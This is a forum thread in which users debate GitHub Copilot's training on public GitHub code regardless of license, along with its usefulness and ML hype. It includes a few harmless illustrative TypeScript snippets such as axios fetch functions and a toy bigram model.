GitHub Support just straight up confirmed in an email that yes, they used all public GitHub code for Codex/Copilot, regardless of license - another ill-conceived GitHub initiative


awoo

https://www.reddit.com/r/programmin...hub_support_just_straight_up_confirmed_in_an/

GitHub Copilot is a VS Code extension that suggests code for you, based on a model trained on publicly available code on GitHub. I'd love to know which manager got swept up in the "AI hype" and decided this was remotely a good idea.
Anyone with two brain cells knows that machines can barely produce semantically meaningful human text, and blindly copy-pasting generated code will lead to dumpster-fire code.
Now they may be in legal trouble, since they trained on all code on GitHub, regardless of license.
 
It is an interesting problem to solve, which is why their ML team came up with it, I'm sure. I haven't used it and won't, but I imagine it looks at the name of the function you create, the language of your file, and the dependencies you're using, and then what, finds some public code to pull from? I wonder how they weigh code quality. Are they pulling mostly from open source?
So when you start writing in a Node file, const fetchUserFromApi...
where will it look first? An open source project with a ton of stars/forks? The documentation for axios, because you have it as a dependency? How far down until it pulls from that personal project someone made that doesn't work? It tries to parse what you want from the name of the function, but will Copilot have suggestions for naming conventions? I am tempted to see how it works.
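Purely as a guess at the kind of thing it might emit for that prompt when axios is in your package.json; the endpoint, response shape, and everything else here are made up for illustration, not anything Copilot actually produces:

Code:
// Hypothetical completion of the sort Copilot might offer after
// `const fetchUserFromApi`. The URL and fields are invented here.
import axios from "axios";

const fetchUserFromApi = async (userId: string) => {
  const response = await axios.get(`https://api.example.com/users/${userId}`);
  return response.data;
};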
Also, I should have recognized ML/AI would buttfuck devs eventually. This will undoubtedly become efficient. ML is really the only path to take as a dev at this point, that and Cloud engineering.

i ended up reading through that reddit thread, and i am once again reminded how much that place disgusts me.
 

I'm highly skeptical, because even if you name your functions well, like const fetchUserFromApi..., this function could do one of a million things depending on which API you're using, what exactly a "user" is, etc. I don't see how this will be useful unless the machine knows your program requirements exactly, or the function is extremely straightforward, like read_csv_file.
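To make the ambiguity concrete, here are two completions that would both be plausible for that name; the endpoints, response shapes, and the second function's name are all hypothetical:

Code:
// Two reasonable bodies for the same idea; nothing in the name says which
// one the author wants. Endpoints and shapes are made up for illustration.
import axios from "axios";

// Interpretation 1: "user" means the currently authenticated account.
const fetchUserFromApi = async (): Promise<{ id: string; name: string }> => {
  const res = await axios.get("https://api.example.com/v1/me");
  return res.data;
};

// Interpretation 2: "user" means an arbitrary record looked up by id,
// with a tolerance for 404s that the first version never considers.
const fetchUserFromApiById = async (id: number) => {
  const res = await axios.get(`https://api.example.com/v2/users/${id}`, {
    validateStatus: (status) => status === 200 || status === 404,
  });
  return res.status === 404 ? null : res.data;
};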
 
They should have trained the model on Stack Overflow instead. I'd be doing the needful at lightspeed.
 
I'm highly skeptical, because even if you name your functions well, like const fetchUserFromApi..., this function could do one of a million things depending on which API you're using, what exactly a "user" is, etc. I don't see how this will be useful unless the machine knows your program requirements exactly, or the function is extremely straightforward, like read_csv_file.
It has to look at part of your code base before making any prediction, otherwise you're right, it would be useless. But how can it do all of this quickly?

I have to try this out now. Hopefully it doesn't get torpedoed before I can play with it.
 

I was waiting for Microsoft to make good on the GitHub acquisition, and there it is. Reading between the lines I'd guess they used all public repositories as training data, but until they say that private repositories are excluded, you can probably assume they're included too. Microsoft did make private repositories free when they acquired GitHub, so it's possible they did that as a CYA.

The feedback loop is definitely coming from VS Code phoning home. Autocomplete a function definition, it's no good, that data gets logged and used in future autocompletes. Good reason to stop using VS Code if you still needed one.
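If it does work that way, the useful signal is just whether a suggestion survived contact with the user. A purely hypothetical shape for such an event; none of these field names come from GitHub or VS Code:

Code:
// Hypothetical accept/reject signal a feedback loop like that would need.
// Every field here is an assumption made up for illustration.
interface CompletionFeedbackEvent {
  suggestionId: string;         // which generated snippet was shown
  accepted: boolean;            // did the user keep it or delete/rewrite it?
  editDistanceAfter30s: number; // how much the user changed it shortly after
  languageId: string;           // e.g. "typescript"
  timestamp: number;            // Unix epoch millis
}

// What one logged event might look like.
const event: CompletionFeedbackEvent = {
  suggestionId: "abc123",
  accepted: false,
  editDistanceAfter30s: 42,
  languageId: "typescript",
  timestamp: Date.now(),
};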
 

I use Neovim for all my personal projects, but for work I need something with the ability to live-write together with others, like VS Code's Live Share. The only other one I know of is IntelliJ, but it costs money. What else is there?
 
Sublime Text comes to mind. Not free, but you can use it as nagware forever.

I've heard good things about TextWrangler/BBEdit, but that's macOS only.


Edit: didn't read the "live write together" part. Not sure then. Google Docs or codeshare.io?
 
I use Neovim for all my personal projects, but for work I need something with the ability to live-write together with others, like VS Code's Live Share. The only other one I know of is IntelliJ, but it costs money. What else is there?

If you're still a student you can get a JetBrains license for free.

But do you really need live code writing? This is the kind of thing that should be handled with code reviews, I thought.
 
Would one of you be so kind as to translate this into plain English so that I might understand it?

Are you saying that they took all of GitHub's hard work and fed it into an AI? Which would make the acquisition of GitHub no more than a cynical grab at information? And that Microsoft didn't want to do the hard work themselves and really had no interest in the concept of GitHub in the first place, seeing as they even took licensed work?
 
The Copilot machine learning model was trained using code from every repository available on GitHub. It has been shown that Copilot is able to reproduce code verbatim from its training pool. That means Copilot can potentially be used to "launder" code, stripping the copyleft licenses (which keep the software free and open) from the original code so it can be used in closed proprietary software. This is a massive legal shitshow brewing.
 
It uses public code (it might use private repos, we're not sure), so it is akin to copy-pasting code you found on GitHub; however, since a tool does it for you, it might be legally implicated for not respecting licenses as well.
 
Also, I should have recognized ML/AI would buttfuck devs eventually. This will undoubtedly become efficient.
I've worked in ML stuff for a bit recently and it's all very underwhelming to me. The models just seem way too specialized and easy to fool, and I'm starting to see stakeholders get really burned by their ridiculous expectations for what the AI 'should' be able to do. And if you're using ML/AI for mathematical/statistical modeling then they're next to worthless in terms of actually understanding the thing you're trying to model (which is arguably the entire point of the modeling process at all).

I'm fully blackpilled on the 'AI revolution' at this point and to be honest I'm all-in on another AI winter coming soon. I think people are starting to wake up from the hype.

It has to look at part of your code base before making any prediction, otherwise you're right, it would be useless. But how can it do all of this quickly?
From what I read about it earlier all Copilot reads is the currently open file. So yes, in its current iteration it's useless for its stated purpose.
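If that's true, the "context" it works from is basically just the text before your cursor in the open buffer. You can sketch that in a few lines; the function below is my own illustration, not anything from the actual Copilot extension:

Code:
// A rough sketch of "context = the currently open file": take whatever
// precedes the cursor, trim it to a character budget, and send that as the
// prompt. Invented for illustration; not Copilot's actual code.
function buildPrompt(openFileText: string, cursorOffset: number, maxChars = 2048): string {
  const prefix = openFileText.slice(0, cursorOffset);
  // Keep only the tail of the file if it exceeds the budget, so the model
  // sees the code nearest the cursor and nothing from the rest of the repo.
  return prefix.length > maxChars ? prefix.slice(prefix.length - maxChars) : prefix;
}

// Everything in other files, or even earlier in a huge file, simply never
// reaches the model under this scheme.
const file = "import axios from 'axios';\n\nconst fetchUserFromApi = ";
const prompt = buildPrompt(file, file.length);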
 
I've worked in ML stuff for a bit recently and it's all very underwhelming to me. The models just seem way too specialized and easy to fool, and I'm starting to see stakeholders get really burned by their ridiculous expectations for what the AI 'should' be able to do. And if you're using ML/AI for mathematical/statistical modeling then they're next to worthless in terms of actually understanding the thing you're trying to model (which is arguably the entire point of the modeling process at all).

The current state of the art is still very specialized tasks. So machines are very good at things like looking at a picture and telling you what animal is shown, or even performing translations, but they are not at the point of generalizing. I listened to an interview with Geoff Hinton, one of the pioneers of neural networks, and he said that we may only be able to generalize when we can train machines on vast quantities of unlabeled data, where the machine has to guess its own labels rather than having them provided beforehand. He also suggests that some of our intelligence, such as the way our optic cells are arranged, already encodes useful information that isn't learned but has evolved over time, which is some justification for hand-designing network architectures rather than learning everything.
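The "guess your own labels" idea is easy to show in miniature: for plain text, the label for each token is simply the next token, so no human annotation is needed. A toy sketch of that, nothing like a real neural model:

Code:
// Toy illustration of self-supervised learning: the "labels" are just the
// next token in the raw text, so the data labels itself. A real system would
// be a neural network; this is only a bigram count table.
function trainBigrams(corpus: string): Map<string, Map<string, number>> {
  const counts = new Map<string, Map<string, number>>();
  const tokens = corpus.toLowerCase().split(/\s+/).filter(Boolean);
  for (let i = 0; i < tokens.length - 1; i++) {
    const cur = tokens[i];
    const next = tokens[i + 1]; // the "label" comes from the data itself
    const row = counts.get(cur) ?? new Map<string, number>();
    row.set(next, (row.get(next) ?? 0) + 1);
    counts.set(cur, row);
  }
  return counts;
}

// Predict the most frequently observed next token.
function predictNext(counts: Map<string, Map<string, number>>, word: string): string | undefined {
  const row = counts.get(word.toLowerCase());
  if (!row) return undefined;
  return [...row.entries()].sort((a, b) => b[1] - a[1])[0][0];
}

const model = trainBigrams("the cat sat on the mat and the cat slept");
console.log(predictNext(model, "the")); // "cat"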
 